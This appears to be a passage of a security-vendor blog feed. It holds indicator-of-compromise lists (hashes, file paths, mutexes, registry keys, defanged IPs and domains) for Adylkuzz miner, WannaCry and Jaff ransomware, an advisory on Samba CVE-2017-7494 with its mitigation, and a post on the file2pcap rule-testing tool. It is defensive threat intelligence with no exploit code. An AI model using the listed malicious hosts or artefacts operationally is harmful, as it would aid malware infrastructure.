%SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\PA6YO4MJ\taskscheduler.2.5.23[1].nupkg
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\de\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\it\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\Microsoft.Win32.TaskScheduler.XML
\Program Files\Microsoft Updates\Tor\torrc
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\JetBrains.Annotations.dll
\Program Files\Microsoft Updates\Tor\cached-microdesc-consensus
%System32%\wdi\{ffc42108-4920-4acf-a4fc-8abdcc68ada4}\{125d5171-5282-4ec7-bad7-3e6ee4a208bf}\snapshot.etl
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\fr\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\svchost.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\JetBrains.Annotations.xml
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\JetBrains.Annotations.xml
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\Microsoft.Win32.TaskScheduler.dll
\Program Files\Microsoft Updates\SharpZLib\package\services\metadata\core-properties\e83d3d4df9744968925840934872efc3.psmdcp
\Program Files\Microsoft Updates\TaskScheduler\lib\net452\Microsoft.Win32.TaskScheduler.XML
%SystemDrive%\Program Files\Microsoft Updates\temp\Tor\Data\Tor\geoip
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\fr\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler.zip
\Program Files\Microsoft Updates\TaskScheduler\TaskScheduler.nuspec
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\Microsoft.Win32.TaskScheduler.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net452\es\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net40\JetBrains.Annotations.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\es\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net35\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\JetBrains.Annotations.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net20\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\JetBrains.Annotations.xml
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net20\Microsoft.Win32.TaskScheduler.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\TaskScheduler.nuspec
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\[Content_Types].xml
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\Microsoft.Win32.TaskScheduler.XML
\Program Files\Microsoft Updates\Tor\cached-certs
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\de\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net40\it\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\JetBrains.Annotations.dll
\Program Files\Microsoft Updates\Tor\hidden_service\hostname
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\JetBrains.Annotations.xml
\Users\Administrator\ntuser.dat.LOG1
\Program Files\Microsoft Updates\TaskScheduler\lib\net40\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\temp\Tor\Data\Tor\geoip6
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\it\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net40\es\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\Microsoft.Win32.TaskScheduler.XML
%System32%\config\TxR\{016888cc-6c6f-11de-8d1d-001e0bcde3ec}.TxR.0.regtrans-ms
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\it\Microsoft.Win32.TaskScheduler.resources.dll
\srvsvc
\Program Files\Microsoft Updates\TaskScheduler\lib\net452\JetBrains.Annotations.xml
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\JetBrains.Annotations.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\de\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\SharpZLib\SharpZipLib.nuspec
%SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\7PC6MCEK\sharpziplib.0.86.0[1].nupkg
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\Microsoft.Win32.TaskScheduler.XML
\Program Files\Microsoft Updates\TaskScheduler\lib\net35\de\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net40\Microsoft.Win32.TaskScheduler.dll
\Program Files\Microsoft Updates\TaskScheduler.zip
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\JetBrains.Annotations.xml
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for SharpZLib.zip\_rels\.rels
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\Microsoft.Win32.TaskScheduler.dll
\Program Files\Microsoft Updates\TaskScheduler\[Content_Types].xml
\Program Files\Microsoft Updates\TaskScheduler\lib\net20\JetBrains.Annotations.xml
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\de\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\SharpZLib.zip
\Program Files\Microsoft Updates\TaskScheduler\lib\net20\JetBrains.Annotations.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\Microsoft.Win32.TaskScheduler.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net40\Microsoft.Win32.TaskScheduler.XML
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\es\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net452\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net20\Microsoft.Win32.TaskScheduler.XML
\TEMP\64442cceb7d618e70c62d461cfaafdb8e653b8d98ac4765a6b3d8fd1ea3bce15.exe
\Program Files\Microsoft Updates\TaskScheduler\lib\net20\fr\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net20\es\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\Microsoft.Win32.TaskScheduler.XML
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\Microsoft.Win32.TaskScheduler.XML
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\TaskScheduler.nuspec

File Hashes

64442cceb7d618e70c62d461cfaafdb8e653b8d98ac4765a6b3d8fd1ea3bce15
94189147ba9749fd0f184fe94b345b7385348361480360a59f12adf477f61c97
ad8965e531424cb34120bf0c1b4b98d4ab769bed534d9a36583364e9572332fa

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

Win.Trojan.Adylkuzz-6317076-0

Indicators of Compromise

Registry Keys

Mutexes

RasPbFile
Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7

IP Addresses

4[.]14[.]36[.]139
212[.]83[.]129[.]195
52[.]173[.]193[.]166
212[.]129[.]46[.]87
45[.]77[.]28[.]163
112[.]139[.]223[.]108
212[.]129[.]46[.]191
212[.]129[.]44[.]155
212[.]129[.]44[.]157
212[.]129[.]44[.]156
45[.]76[.]51[.]128

Domain Names

icanhazip[.]com
aa1[.]super5566[.]com
xmr[.]crypto-pool[.]fr
08[.]super5566[.]com

Files and or directories created

%WinDir%\Fonts\wuauser.exe
%WinDir%\Fonts\id.txt
%WinDir%\Temp\s1vs._Miner_.log
%WinDir%\Fonts\msiexev.exe
%WinDir%\Temp\s1vs.1_.exe
%WinDir%\Fonts\history.txt

File Hashes

8200755cbedd6f15eecd8207eba534709a01957b172d7a051b9cc4769ddbf233
6f74f7c01503913553b0a6118b0ea198c5a419be86fca4aaae275663806f68f3
d73c9230811f1075d5697679b6007f5c15a90177991e238c5adc3ed55ce04988
51d435cf247b602c104b8d1fb275918c1fa7395a138b26a8aef77b40bf3f09ba
c2d982b902af50dd01f299d2220314000ea319b836af33f8006a813b9b2cfb17
da22bc77a46f2235f6e399a4bb175488bf7d71912f03ff72a34a7515ef13e11b

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

Win.Ransomware.WannaCry

Indicators of Compromise

Registry Keys

<HKCU>\CONTROL PANEL\DESKTOP

Value: Wallpaper

<HKCU>\Software\WanaCrypt0r
<HKLM>\Software\Wow6432Node\WanaCrypt0r

Mutexes

MsWinZonesCacheCounterMutexA

IP Addresses

Domain Names

iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[[.]]com

Files and or directories created

%SystemDrive%\b.wnry
%SystemDrive%\c.wnry
%SystemDrive%\r.wnry
%SystemDrive%\s.wnry
%SystemDrive%\taskdl.exe
%SystemDrive%\taskse.exe
%SystemDrive%\t.wnry
%SystemDrive%\u.wnry

File Hashes

b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
4186675cb6706f9d51167fb0f14cd3f8fcfb0065093f62b10a15f7d9a6c8d982
4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79
1be0b96d502c268cb40da97a16952d89674a9329cb60bac81a96e01cf7356830
2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c
055c7760512c98c8d51e4427227fe2a7ea3b34ee63178fe78631fa8aa6d15622
e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b
97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6

Coverage

Screenshots of Detection

AMP

ThreatGrid

Screenshot

Win.Ransomware.Jaff

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

84[.]242[.]240[.]62

Domain Names

panaceya-n[.]ru

Files and or directories created

\TEMP\ratchet20.exe

File Hashes

03363f9f6938f430a58f3f417829aa3e98875703eb4c2ae12feccc07fff6ba47
d8bb054fa738d7ba1b88f65e2b7dcf40a234bec8ec318e472380b603ed9ba0dc
b9434c5fd5eefb8fb182024ecd3da4888222cae8a230fc0a778a7b712746f9f3
64580b7bb2eedf6e2d2f5e773b34a62f5065c4cb167cd4ed0791050f425c546e
8dbaab384ecd5386d960d1dddd7fd50ab3a30389dd5b8e516c5d873d77a1bbf9
aca726cb504599206e66823ff2863eb80c6a5f16ff71ca9fcdd907ad39b2d852
341267f4794a49e566c9697c77e974a99e41445cf41d8387040049ee1b8b2f3b
e081c4557f4153d2fc9102fabc55aa6acdf8e1e11062529c728f4506b0d981b9
5f1fcdfb951dc4642ce136a5d3e6bc42021f8e0cd631975a5eb3842da020531c
0746594fc3e49975d3d94bac8e80c0cdaa96d90ede3b271e6f372f55b20bac2f
f61d07cd7d32a6cb9ead8e82f43ef84cf54a89ef571d9b2a9cb0ecaf5319f5db
387812ee2820cbf49812b1b229b7d8721ee37296f7b6018332a56e30a99e1092
a0f72a7e67bfed40031c52a706b45de3787958729a308b5f15e754341022ed8e
6b5759c6c3d7c7c21859023b4fcc443aa5343759a7a08c3870c5269e5c34a958
94195aa110563ab1bd2542fb71806df5921c4c730036aa8faeaf537dcc01162c
2bc87f1bbfdb23fe503ef89bcbf6908ffd7218433e0fbfa51282c0dc51dece01
d1537972d7ac8f5f7c675c14027336715cb0bf91fe440d792e990d0efbd52710

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

Samba Vulnerability: Dancing Its Way to a Network Near You

noreply@blogger.com (Nick Biasini) — Thu, 25 May 2017 00:31:00 PDT

Overview

Today, a new vulnerability affecting the widely used Samba software was released. Samba is the SMB/CIFS protocol commonly used in *NIX operating systems. CVE-2017-7494 has the potential to impact many systems around the world. This vulnerability could allow a user to upload a shared library to a writeable share on a vulnerable Samba server and result in the server executing the uploaded file. This would allow an attacker to upload an exploit payload to a writeable Samba share, resulting in code execution on any server running an affected version of the Samba package. This currently affects all versions of Samba 3.5.0 (released March of 2010) and later. To emphasize the severity and low complexity: a metasploit one-liner can be used to trigger this vulnerability.

A patch has already been released to address the issue. Additionally, there is a mitigation available within the configuration of Samba itself. Adding the argument "nt pipe support = no" to the global section of the smb.conf file and restarting the service will also mitigate the threat. This threat is only beginning to be recognized by potential attackers with POC code having already been released on the Internet. It is only a matter of time before adversaries begin to use it more widely to compromise additional systems, both externally and internally.

This is likely to affect numerous servers, storage devices such as NAS systems, and anything else running the version of Samba that is vulnerable to this attack. Users are urged to contact their vendor to obtain patched firmware or recommendations for addressing this threat. In the meantime the above workaround may help. In accordance with best practices, it is highly recommended that users do not allow direct SMB, Samba, CIFS, NFS, etc. access from the Internet to systems within their network.

Coverage

Snort Rule: 43002-43004

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella prevents DNS resolution of the domains associated with malicious activity.

Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.

File2pcap - The Talos Swiss Army Knife of Snort Rule Creation

noreply@blogger.com (William Largent) — Wed, 24 May 2017 09:02:00 PDT

This post was authored by Martin Zeiser with contributions by Joel Esler

At Talos we are constantly on the lookout for threats to our customers networks, and part of the protection process is creating Snort rules for the latest vulnerabilities in order to detect any attacks.

To improve your understanding of the rule development process, consider a theoretical remotely exploitable vulnerability in server software Server2010. A proof-of-concept exploit is developed, the server software set up on a virtual machine, traffic is captured on the network between attacker and victim, rule development can start, right?

But what if months or years later, the rule needs to be re-inspected, because circumstances have changed? This requires another vulnerable version of Server2010 to be found, reinstalled and reconfigured to the vulnerable parameters, to run tests again and again, so that network traffic can be inspected. Then when the server is installed, the particular exploit used does not work anymore, because the language it was written in has since changed and the code needs to be fixed accordingly. All this requires plenty of time, which is why it doesn’t happen that way. Instead, a vulnerability is identified, an exploit is written, the exploit is ran, and the attack captured using Wireshark. From then on, the traffic in said pcap file can be used to develop a correct rule. The traffic recorded in a pcap file can easily be put back on the wire using a tcp replay utility, or read directly by Snort. This is why rule developers generally work with pcaps of attacks, instead of exploits.

Regarding file-based vulnerabilities, the original process used to involve starting a local webserver and using a browser to download the exploit file, while recording the transfer using Wireshark. File2pcap revolutionized this requirement by simulating the traffic and creating the proper pcap without any hassles.

Supported protocols:

HTTP:

File2pcap started out as a tool to create pcaps from input files, showing these files in transfer from a web server to a browser. By simulating the entire data exchange it is possible to create a pcap file for any input file, usually within seconds. The result always shows a full TCP stream from SYN to FIN with packets in order and checksums correct. These pcap files can then be used in combination with a tcp replay tool (or read by Snort) to create proper rules for all file-based attacks.

HTTP/2:

HTTP has evolved in the last number of years, with HTTP/2 now being in widespread use. It is typically used encrypted, but the protocol does also support plaintext connections, which is why HTTP/2 was added to file2pcap.

HTTP POST:

Though HTTP GET is the prevalent request coming from a browser, sometimes data is uploaded using HTTP POST. To cover this angle, support for HTTP POST was added to file2pcap.

SMTP/POP3/IMAP:

While browser-based attacks are one of the most common ways machines are compromised, another threat is email and attachments. In order to let Snort rule developers create pcaps for these threats just the way file2pcap allowed them for browser-based attacks, new features were added. Specifically support for the SMTP, POP3 and IMAP protocols. When file2pcap is instructed to craft an SMTP pcap from an input file, it simulates an email from a client to a mail server with the input file sent as an attachment to this email. POP3 and IMAP work similarly. Command-line switches allow for the encoding of the attachment to be switched from the default MIME to quoted-printable or even UU-encoding.

FTP:

Another typical file transfer protocol which file2pcap supports is the FTP protocol, where both ‘active’ and ‘passive’ data streams can be created.

IPv6:

To prepare file2pcap even better for covering any upcoming attacks, one of the latest additions was support for IPv6. Now a simple command-line flag can switch the data exchange from the default IPv4 to IPv6, while keeping everything else the same.

Talos GitHub

To wrap it up, file2pcap is a tool which will create a pcap from any input file, simulating this file in transit, using various protocols and encodings. The resulting pcap file can then be used to create or test rules for Snort. File2pcap is in widespread use within Talos for rule creation, as it works reliably while saving plenty of development time.

File2pcap can be downloaded from our Github page
Feedback and feature requests are welcome on our Github Issues Page